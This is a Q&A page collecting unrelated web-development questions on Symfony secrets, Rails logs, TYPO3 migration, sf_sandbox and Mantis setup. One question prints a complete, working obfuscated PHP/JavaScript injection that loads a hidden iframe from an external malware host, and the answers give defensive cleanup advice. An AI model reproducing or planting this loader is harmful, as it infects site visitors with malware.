Hiding production passwords from unauthorized users in Symfony - symfony1
Symfony worked great for us when we were a small team of trusted developers. Now however, we are getting more people to help out, which leads to a problem with managing production passwords checked into source control.
I have production passwords for our DB, API keys, etc. stored in the Symfony config files which I do not want all developers to have access to. How can I hide these passwords from unauthorized developers and yet still grant them access to the source code?
If you're already using a version control: your first stop should be removing all passwords from the history in your versioning system. Good luck ;-)
Next: isolate the files which have passwords in them. (Probably config/databases.yml and apps/<yourapp>/app.yml.).
Copy/rename this files to *.yml.dist (for example: config/databases.yml.dist). Clean up all production passwords from these files, and leave only
the bare minimum to keep it going.
Make sure the original files don't appear in your VCS ever again. (svn ignore, or the likes).
Now when you set up a new environment, you can just copy the *.dist files to their 'real' names.
(What I did for my project is move all API keys to a single apikeys.yml in the config directory. That way all the properties in the app.yml keep being versioned, and my api keys don't appear in the VCS.
Hope you get the answer for your question. Recently I have implement these kind of works in my project.I think to store these kind of confidential data database is the safe options and get this data using filter is the best option no need to store your data in app.yml.
Related
How to display log for Rails application?
I have a rails app and I would like to display the log in the app itself. This will allow administrators to see what changes were recently made without entering the console and using the file with the logs. All logs will be displayed in the application administration. How is it possible to implement and what kind of gems do I need to use?
You don't need a Gem. Add a controller, read the logfiles and render the output in HTML. Probably need to limit the number of lines you read. Also there might be different log files to chose from. I don't think this is a good idea though. Log files are for finding errors and you should not need them in your day to day work, unless you manage ther server. Also they might contain sensitive data (CC Numbers, Pwds, ...) and it might get complicated when you use multiple servers with local disks. Probably better to look at dedicated tools for this and handle logs outside of your application.
Assuming that you have git associated with your application or git bash installed in your system. For displaying log information for the development mode, migrate to your application folder in your console/terminal and type tail -f log/development.log
typo3 website move to other domain - need help step by step
I just got a typo3 website and need to transfer to an other domain. Is it enough to copy all the folders (except typo3temp?) to the new place? First I just changed baseurl in ts but it didn't do anything.. Should I do anything with the database when it still on the same server?
In case your question is about "cloning" a complete TYPO3-system an rsync/copy of the whole folder (yes including typo3temp) is the best idea, as this works on all versions, everything else (like excluding typo3temp) depends a whole lot on your TYPO3 expertise to resolve. The database needs to be copied as well. If you need to change db-name or db-credentials on the new system you need to change them in typo3conf/LocalConfiguration.php As soon as you have done this Install Tool and Backend should work: At first try the Install Tool: https://my.new.domain/typo3/install/ If that doesn't work your problem is with the webserver configuration or dns. If that works (and the reports there show no errors), try the Backend: https://my.new.domain/typo3/ In case your question is about which changes are necessary to your TYPO3-installation if domain changes and the web server itself is configured correctly, then there are probably two things you need to change, in order to make the frontend work (although both cases might be omitted, depending on your configuration): sys_template record, if any of those use absRefPrefix or baseurl. If you have access to the MySQL-Database a SELECT pid FROM sys_template WHERE config LIKE "%baseurl%" OR "%absRefPrefix"; might help finding the template, however these template configuration might also be stored in files (typically in fileadmin/templates/**) sys_domain records, a MySQL SELECT pid FROM sys_domain; might uncover where those are stored However these changes are only necessary to enable the frontend to work.
Add a domain record in the backend. And while you don't need the content of the typo3temp folder, make sure the folder actually exists.
When you go to the new domain name in your browser, what happens? Do you get redirected to the old domain? If so, maybe there is an .htaccess redirect happening. Do you get to the new domain, but if you click on a link end up on the old one? Do you get an error? If so, what is the error? Does something else happen?
Found This Hack in my web server php files
How did i get them and what can i do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#
It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.
Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data. If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded. If you have no CMS, change your FTP & control panel passwords. As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it. To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.
this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux). I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do. Many of my files were infected with something like: <?php #8f4d8e# ... #/8f4d8e# ?> I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system. If you have SSH access to the server go to your document root and search for all files containing the string: grep -R "#8f4d8e#" . You could also look for your version of the god.php file... look for traces of R57, for example by issuing: grep -R "R57" . Mine had a big ASCII art drawing of a bug at the beginning of the file. I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company). What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.
May I use sf_sandbox directly as my symfony project?
As sf_sandbox has set up the symfony environment, why not develop in the sandbox directly and then upload on to server? What are the disadvantages of sandbox compared with configuring manually?
I think there is no drawback in following this approach. sf_sandbox is a pre-configured symfony project. One of the pluses is that is saves you time in creating your project and initializing an empty application (by default this is called frontend). It's more a matter of taste rather than a matter of right or wrong. It's up to you! Note: If you follow this approach you have to make some initial configuration (steps 1,2,3 would be done anyway if you started your project from scratch): Rename the project Change the config/properties.ini file Change the config/databases.yml file (by default sf_sandbox uses sqlite database) Remove the data/sandbox.db database file
How to upgrade mantis bug tracker database online?
Your database has not been created yet. Please create the database, then install the tables and data using the information above before proceeding.
Use a ftp/sftp/scp app like WinSCP to examine your directory. There's usually a readme file in the directory. Read it and do what it says. It'll likely say to run a script, visit an admin page (and then remove it when you're done), etc.. Or it may say to create your database, and enter the relevant info (hostname, directory, userid/pwd) into a .config file or something. Oh, and you probably need to have a database created on the host before you do this. Sites like dreamhost and pair have control panels where you create the database, and give the admin/dba userid/passwords. Then it comes back with the server host name/directory where you will point your config to.